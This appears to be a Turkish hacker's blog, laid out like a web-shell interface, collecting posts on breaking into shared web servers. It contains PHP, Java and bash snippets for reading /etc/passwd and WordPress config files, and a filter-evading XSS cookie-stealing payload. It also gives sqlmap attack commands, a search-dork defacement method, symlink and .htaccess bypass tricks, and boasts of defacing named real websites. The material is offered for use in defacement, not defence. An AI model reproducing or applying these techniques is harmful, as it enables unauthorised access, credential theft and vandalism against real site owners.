DisLanZe | Siber Alemin Korkusuz Yazarı

dislanze
v10
today : | at : dislanze | safemode : ON
> / home / facebook / twitter / exit /
name author perms com modified label

$ Java ile Etc/passwd Bypass $ Süleyman Akyıldız rwxr-xr-x 4 Mayıs 28, 2018

Filename $ Java ile Etc/passwd Bypass $
Permission rw-r--r--
Author Süleyman Akyıldız
Date and Time Mayıs 28, 2018
Label
Action

Sunucuya nc ile connect olun bunu js ,java ile kaydedin çalıştırın
KOD:
public void readLinuxUsers()
   {
       try
       {
           BufferedReader in = new BufferedReader(new FileReader("/etc/passwd"));
           String str;
           str = in.readLine();
           while ((str = in.readLine()) != null)
           {
               String[] ar = str.split(":");
               String username = ar[0];
               String homedir = ar[6];

           }
           in.close();
       }
       catch (IOException e)
       {
           System.out.println("File Read Error");
       }
   }

// Advanced XSS injection // Süleyman Akyıldız rwxr-xr-x 2 Mayıs 20, 2018

Filename // Advanced XSS injection //
Permission rw-r--r--
Author Süleyman Akyıldız
Date and Time Mayıs 20, 2018
Label
Action


bazı durumlarda site güvenlik duvarı xss injection yapmanıza izin vermez. böyle şeylerde güvenlik duvarını atlatmanın bir yolunu göstereceğim.

xss injection yaparken mesela payloadımız
Kod: <script>alert(********.cookie);</script>


"
olsun

Mesela biz burada "script" stringinin harflerin büyük küçük yazabiliriz
ya da encode etmeyi deneyebiliriz.
Fakat bazen bunlar yeterli gelmez. Bu durumda şöyle bir şey yapabiliriz


Kod: <sc<script>ript>alert(********.cookie);</sc</script>ript>


Farkındaysanız iç içe 2 tane " <script> </script> " bloğu ekledik.
buna kendi yöntemlerimizide ekleyerek site güvenliğini atlatabiliriz.

BugBounty işiyle uğraşanlar için değerli olduğunu düşünüyorum.

Sqlmap Hatalarına Çözüm ! Süleyman Akyıldız rwxr-xr-x 2 Mayıs 20, 2018

Filename Sqlmap Hatalarına Çözüm !
Permission rw-r--r--
Author Süleyman Akyıldız
Date and Time Mayıs 20, 2018
Label
Action


1.Bu Hata Sayılmaz Sadece Blind Sql İnjection'larda Daha hızlı veri çekmenizi sağlar--threads
Kullanımı : sqlmap -u http://www.xxxxx.com/xxx/php?id=33 --dbs --threads=10
Yani ne yazacaksanız en sona bu parametere'yi ekliyeceksiniz


2.[CRITICAL] there is considerable logging in connection respnse (s). Please use as high val ve for option '--time-sec' as possible (e.g. 10 or more)
Kullanımı : sqlmap -u http://www.xxxxx.com/xxx/php?id=33 -p id --dbs --level=3


3.[CRITICAL] Unable to retrieve the database names
Kullanımı : sqlmap -u http://www.xxxxx.com/xxx/php?id=33 --dbs --no-cast --threads=10


4.[CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
Kullanımı : sqlmap -u http://www.xxxxx.com/xxx/php?id=33 --dbs --user-agent
Olmassa : sqlmap -u http://www.xxxxx.com/xxx/php?id=33 --dbs --user-agent --level=3
Olmassa : sqlmap -u http://www.xxxxx.com/xxx/php?id=33 --dbs --user-agent --level=5 --no-cast --threads=10

$ Tar Açığı İle Site Deface $ Süleyman Akyıldız rwxr-xr-x 0 Mayıs 20, 2018

Filename $ Tar Açığı İle Site Deface $
Permission rw-r--r--
Author Süleyman Akyıldız
Date and Time Mayıs 20, 2018
Label
Action

Dorkumuz : inurl:/"config/config.izo"

- Bu Dorku Arama Motorumuzda Taratalım Ve Çıkan Herhangi Bir Siteye Tıklayalım
- Çıkan Sitede 2 Bölümlü Yazı Yazma Yeri Çıkacaktır 2sinede Yazı Yazın Yoksa Kabul Etmez
- Yazdıktan Sonra 'Hajar' Yazısına Tıklayalım Karşınıza Done Yazısı Gelecektir
- Done Yazısı Geldikten Sonra Urldeki 'Config.izo' Yazısını Silip /tar.tmp Yazısını Ekleyelim Ve Karşımıza Hacklediğimiz Yer Gelcektir

Bu Açık Siteye Zarar Vermez Ama Zone Kasabilir Siteleri Deface Edebilirsiniz​

Zero Day // Nedir? Ne Değildir ? Süleyman Akyıldız rwxr-xr-x 0 Mayıs 20, 2018

Filename Zero Day // Nedir? Ne Değildir ?
Permission rw-r--r--
Author Süleyman Akyıldız
Date and Time Mayıs 20, 2018
Label
Action
ZeroDay genellik ile ülkemizde çok iyi bir exploite denir. Ama uzaktan ve yakından alakası yoktur.
Peki inceleyecek olursak fazla lafa tutmadan aşağıya bakabilirsiniz.

ZeroDay Nedir ?

ZeroDay, Bu gün içerisinde yeni çıkmış olan exploite denir.
ZeroDay açıkları dediğimiz olay, Yeni bir yazılım veya sistem üzerindeki açığın tespit edilip bu açığa saldırı yapmak için üretilen exploite verilen addır.


ZeroDay Exploitleri neye denir?


ZeroDay açığı bulunan sistemlere, hackerlar tarafından otomatik saldırı için geliştirilmiş olan script veya yazılımlara denir. ZeroDay açıkları bulunduğu andan itibaren saldırıya tamamen açıktır.​

Server Bypass Method #1 Süleyman Akyıldız rwxr-xr-x 1 Mayıs 20, 2018

Filename Server Bypass Method #1
Permission rw-r--r--
Author Süleyman Akyıldız
Date and Time Mayıs 20, 2018
Label
Action


/home/ornekKullanici/public_html/wp-config.php yolunu kendinize göre değiştirin , o kısımı örnek olarak verdim.

<?php
$dislanze = "/home/ornekKullanici/public_html/wp-config.php";
$cek = file_get_contents($dislanze);
echo $cek;
?>​

ETC Bypass Method Efsane! Süleyman Akyıldız rwxr-xr-x 1 Ocak 13, 2018

Filename ETC Bypass Method Efsane!
Permission rw-r--r--
Author Süleyman Akyıldız
Date and Time Ocak 13, 2018
Label
Action

Bu methodu çogu sw bir zamanlar yiyordu en saglam dediniz sw ler bunu yiyordu 2016 en son bi sw de denemistim saglam işe yaradı hala sonuc veriyordur .php olarak kaydedin etc leri verir

Kod:
<?php for($uid=0;$uid<2000;$uid++){ //cat /etc/passwd $nothing = posix_getpwuid($uid); if (!empty($nothing)) { while (list ($key, $val) = each($nothing)){ print "$val:"; print "<br />"; ?>

C1 ile Linux Server Bypass Süleyman Akyıldız rwxr-xr-x 0 Ocak 13, 2018

Filename C1 ile Linux Server Bypass
Permission rw-r--r--
Author Süleyman Akyıldız
Date and Time Ocak 13, 2018
Label
Action


Bu yazıda sizlere "C1" ile Linux server bypass göstereceğim.
Bir Linux server düşünün, ln , cat komutları çalışmıyor.
Symlink kapalı.
Symlink kapalı ama,Symlinki bilgisayardan upload ederseniz,ne olur?
Gelin bakalım,

Konunun sonunda vereceğim c1 dosyasını servere upload ediyoruz.



Sonra servere şu komutu veriyoruz: tar -xvf c1.tar.gz


c1 diye bi klasör geldi. Bakalım içinde ne varmış? 



1 ve .htaccess dosyası. 1 klasörünün içine girerseniz root dizininde olduğunuzu görüceksiniz


Ayrıca şu şekilde de erişebilirsiniz. http://siteadi.com/c1/1/ 


600 Tane Minecraft Premium Hesap Sadece Burada Süleyman Akyıldız rwxr-xr-x 1 Kasım 05, 2017

Filename 600 Tane Minecraft Premium Hesap Sadece Burada
Permission rw-r--r--
Author Süleyman Akyıldız
Date and Time Kasım 05, 2017
Label
Action

Hediyem Olsun istediğiniz hesaplari vb. yoruma bırakın paylaşiyim

Bash ile Etc Bypass Symlink Okuma Süleyman Akyıldız rwxr-xr-x 0 Ekim 24, 2017

Filename Bash ile Etc Bypass Symlink Okuma
Permission rw-r--r--
Author Süleyman Akyıldız
Date and Time Ekim 24, 2017
Label
Action

Sunucuda fonksiyonlar kapalıysa perl python vb. engelliyse 
Shellimizden yeni dosya açıp adını DisLanZe.sh yapiyoruz. 

ve içine :
cat -n /etc/passwd >> DisLanZe.txt şeklinde komutumuzu yaziyoruz
ve komut yerinden bash DisLanZe.sh şeklinde okuttuktan sonra DisLanZe.txt şeklinde etc passwd okunucak.

ayni şekilde permisson verirse komutlari degiştirebilirsiniz. configte okursunuz herşey yapabilirsiniz.

Litespeed (403 Forbidden) Symlink Bypass Süleyman Akyıldız rwxr-xr-x 1 Eylül 20, 2017

Filename Litespeed (403 Forbidden) Symlink Bypass
Permission rw-r--r--
Author Süleyman Akyıldız
Date and Time Eylül 20, 2017
Label
Action
.htaccess :
Kod:
Options +FollowSymLinks
DirectoryIndex Index.html
Options +Indexes
AddType text/plain .php
AddHandler server-parsed .php

osmanlitim.org hacked Süleyman Akyıldız rwxr-xr-x 1 Haziran 18, 2017

Filename osmanlitim.org hacked
Permission rw-r--r--
Author Süleyman Akyıldız
Date and Time Haziran 18, 2017
Label
Action
onune gelen tim aciyo bu nasil istir 
http://osmanlitim.org/
http://mirror-h.org/browse/804482/
http://archive.is/mDZop

mybb.com.tr Hacked Süleyman Akyıldız rwxr-xr-x 3 Mayıs 26, 2017

Filename mybb.com.tr Hacked
Permission rw-r--r--
Author Süleyman Akyıldız
Date and Time Mayıs 26, 2017
Label
Action


MyBB TR 
http://mybb.com.tr/

http://archive.is/U2vd2
http://mirror-h.org/browse/725049/